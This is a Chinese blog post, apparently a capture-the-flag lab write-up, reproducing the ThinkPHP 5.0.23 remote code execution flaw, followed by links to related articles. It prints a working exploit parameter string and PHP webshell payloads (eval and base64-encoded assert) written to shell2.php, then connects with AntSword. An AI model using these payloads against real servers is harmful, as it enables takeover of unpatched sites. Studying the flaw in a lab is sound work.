ThinkPHP5.0.23 远程代码执行漏洞

最新推荐文章于 2024-02-01 21:55:40 发布
最新推荐文章于 2024-02-01 21:55:40 发布
阅读量1.4k 收藏 9
点赞数 4
分类专栏: 中间件漏洞 文章标签: 安全 django python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/121435111
版权

ThinkPHP5.0.23 远程代码执行漏洞

漏洞描述:


ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。

漏洞影响:


ThinkPHP <= 5.0.24

环境复现:

靶场地址【安鸾渗透实战平台】地址

漏洞复现:

在kali中查询Thinkphp5.X相关漏洞,发现存在。

查看该漏洞文件。

 发现完整版thinlphp5.0.23版本的poc。

 由于是post传参,所以用burp抓包或者浏览器插件,插入刚才的poc

 得到运行后的结果。

 使用phpinfo函数验证_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

 发现返回结果。

 

 我们创建一个shell2.php文件并向文件中写入一句话脚本。

发现上传成功。

 访问脚本,发现报错,猜测是编码的问题。

 

尝试编码执行echo “%3c%3fphp+%40eval(%24_POST%5b123%5d)%3b%3f%3e” > shell2.php

 发现还是报错。

尝试使用base64编码写入并且使用assert代替eval

zzz<?php @assert($_POST['xss']);?>yyy

enp6PD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/Pnl5eQ==

 进行poc上传。

访问发现回显成功。

 蚁剑进行连接,这里采用chr或者base64。

 

 

 

 连接成功,成功进入到后台。

 在根目录下发现flag。

 查看flag。

 

xzhome
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp5.0.23漏洞复现以及脚本编写
weixin_45653478的博客
04-26 867
ThinkPHP5.0.23漏洞主要涉及远程代码执行(RCE)的安全隐患。这一漏洞的存在是因为ThinkPHP框架在底层对控制器名的过滤不够严格,导致攻击者有可能通过特定的URL构造,调用到框架内部的敏感函数,进而执行任意命令。
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP5 5.0.23 远程代码执行漏洞
怪味巧克力的博客
05-21 3373
准备 这里我用的是vulhub的docker搭建的靶场,关于docker 使用我不再阐释,百度即可,本次是练习所做的笔记,为自己以后复习提供方便 介绍 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 部分源码 @@ -415,7 +415,7 @@ public function pathinfo() foreach (C
Thinkphp5.0.23远程代码执行漏洞
hovcfuti的博客
10-13 301
漏洞简介Thinkphp5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。影响版本漏洞复现在vulhub里面拉取靶场访问可以使用burp suite抓包,也可以使用hackbar浏览器插件,总之可以发post请求包就好请求文件:/index.php?
Thinkphp5.0.23远程代码执行漏洞复现
最新发布
02-01 1457
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现。
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE)漏洞,该漏洞允许攻击者在服务器上执行任意代码。 该漏洞是由于 ThinkPHP 的路由机制存在缺陷,攻击者可以通过构造特殊的 URL 来...
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
标题中的“thinkphp5远程执行代码漏洞修复补丁”指的是ThinkPHP5框架存在一个严重的安全问题,即远程代码执行漏洞(通常称为RCE)。在ThinkPHP5中,这个漏洞允许攻击者通过精心构造的HTTP请求,执行任意系统命令,...
ThinkPHP v5.0.23 核心版
10-05
8. `.travis.yml`:Travis CI的配置文件,用于自动化持续集成,当代码提交到版本库时,自动执行构建和测试。 9. `runtime`:这是一个运行时目录,通常存放框架运行过程中产生的临时文件,如日志、缓存等。 10. `...
thinkphp 一键漏洞检测
12-09
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
网络安全深入学习第二课——热门框架漏洞(RCE—Thinkphp5.0.23 代码执行
p36273的博客
09-16 1382
简言之,别人帮你建好了房子但尚未装修,你需要在别人设计好的户型里去装修,省去你搬砖的重复性操作。------ ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列,各个系列之间在代码实现及功能方面,有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护,ThinkPHP 5系列现使用最多,而ThinkPHP 3系列也积累了较多的历史用户。
ThinkPHP5 5.0.23 远程代码执行漏洞复现,python编写POC和EXP
wangqiao258的博客
10-05 1402
环境搭建: 使用vulhub,进入对应文件夹启动环境: [root@localhost ~]# cd /home/vulhub/thinkphp/5.0.23-rce/ [root@localhost 5.0.23-rce]# docker-compose up -d 查看端口: [root@localhost 5.0.23-rce]# docker ps CONTAINER ID IMAGE COMMAND CREATED
thinkphp漏洞_ThinkPHP5.0 远程代码执行漏洞
weixin_39634579的博客
11-25 208
漏洞介绍ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源MVC框架,简单来说就是Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php这个类可以处理http请求设置但此框架支持表单伪装变量,通过伪装变量实现任意函数的调用影响版本5.0全版本复现环境Vulhub漏洞靶场vulhub-master/thinkphp...
[bhpyg] Thinkphp5 XSS攻击防御
u011436748的博客
01-14 749
1、什么是XSS攻击 跨站脚本攻击(Cross Site Scripting),攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 模拟过程: 添加功能中,请求参数值包含script标签js代码 添加成功之后,数据表中: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aaWwUc0I-1610609856714)(file:///C:\Users\asus\AppData\Local\T
ThinkPhp中防止Xss攻击
wwwchenyc的博客
03-09 2865
收集用户提交的表单信息时候,该表单里边有可能存在相关的“代码”(html/css/js等代码),这样代码会在信息显示的时候对页面效果造成干扰。 防范:htmlspecialchars ,作用把“”符号变为符号实体       htmlpurifier  ,清空不符合标准的标记内容,保留允许的标记内容 具体使用方法, 1、下载htmlpurifier,解压后将library文件夹放到Thin
ThinkPHP5小于5.0.24 远程代码执行高危漏洞 修复方案 bug修复
飙歌的博客
05-07 966
漏洞描述由于ThinkPHP5.0框架对Request类的method处理存在缺陷,导致黑客构造特定的请求,可直接GetWebShell。 漏洞评级 严重 影响版本 ThinkPHP 5.0系列 < 5.0.24 安全版本 ThinkPHP 5.0系列 5.0.24 ThinkPHP 5.1系列 5.1.31 安全建议 升级ThinkPHP至安全版本 修复方法1.打开 \thi...
xss攻击 php,ThinkPHP防止XSS攻击的方法
weixin_32887779的博客
03-10 317
本篇文章介绍了设置TP防止XSS攻击的方法,希望对学习ThinkPHP的朋友有帮助!ThinkPHP防止XSS攻击的方法1 如果您的项目没有富文本编辑器 然后就可以使用全局过滤方法 在application下面的config配置文件 加上 htmlspecialchars// 默认全局过滤方法 用逗号分隔多个'default_filter' => 'htmlspecialchars',如果有...
thinkphp5.0.23rce漏洞复现
09-22
漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值